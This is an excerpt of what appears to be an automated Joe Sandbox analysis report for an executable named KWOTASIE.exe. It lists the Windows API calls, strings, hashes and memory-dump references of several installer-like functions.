Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Innoxious$Lx$Remove folder: $6B
API String ID: 2624150263-1364077795
Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\AppData\Local\Innoxious\olivilin, xrefs: 004021BD

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Innoxious\olivilin
API String ID: 542301482-136261422
Opcode ID: 1c7b5804a30cad328b29b1af23ede5e0894dc90a4e1fd6790c8eeac3ce3dce31
Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
Opcode Fuzzy Hash: 1c7b5804a30cad328b29b1af23ede5e0894dc90a4e1fd6790c8eeac3ce3dce31
Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3d6c516f40f3da80561d184b45c27c8c6da11a827e53ba382eae435cc270f487
Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
Opcode Fuzzy Hash: 3d6c516f40f3da80561d184b45c27c8c6da11a827e53ba382eae435cc270f487
Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A

Function 0040437E Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
GetDlgItem.USER32(?,000003E8), ref: 00404430
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
GetSysColor.USER32(?), ref: 0040445E
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
lstrlenW.KERNEL32(?), ref: 0040447F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
GetDlgItem.USER32(?,0000040A), ref: 004044FA
SendMessageW.USER32(00000000), ref: 00404501
GetDlgItem.USER32(?,000003E8), ref: 0040452C
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
SetCursor.USER32(00000000), ref: 00404580
LoadCursorW.USER32(00000000,00007F00), ref: 00404599
SetCursor.USER32(00000000), ref: 0040459C
SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD

Strings

Remove folder: , xrefs: 0040455B
N, xrefs: 0040451A
Lx, xrefs: 004044DA

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Lx$N$Remove folder:
API String ID: 3103080414-2024812794
Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC

Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
wsprintfA.USER32 ref: 00405F17
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
GlobalFree.KERNEL32(00000000), ref: 00406000
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007

Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64

Strings

[Rename], xrefs: 00405F81, 00405F93
%ls=%ls, xrefs: 00405F0D

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD

Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406543
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406557
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 0040656A

Strings

*?|<>/":, xrefs: 00406532
"C:\Users\user\Desktop\KWOTASIE.exe", xrefs: 004064E0
C:\Users\user\AppData\Local\Temp\, xrefs: 004064E1, 004064E6

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3981424367
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD

Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404265
GetSysColor.USER32(00000000), ref: 00404281
SetTextColor.GDI32(?,00000000), ref: 0040428D
SetBkMode.GDI32(?,?), ref: 00404299
GetSysColor.USER32(?), ref: 004042AC
SetBkColor.GDI32(?,?), ref: 004042BC
DeleteObject.GDI32(?), ref: 004042D6
CreateBrushIndirect.GDI32(?), ref: 004042E0

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724

Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58

Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
GetMessagePos.USER32 ref: 00404B9D
ScreenToClient.USER32(?,?), ref: 00404BB7
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF

Strings

f, xrefs: 00404BCB

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38

Strings

Times New Roman, xrefs: 00401E1E

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(000EE5EC,00000064,000EFE58), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

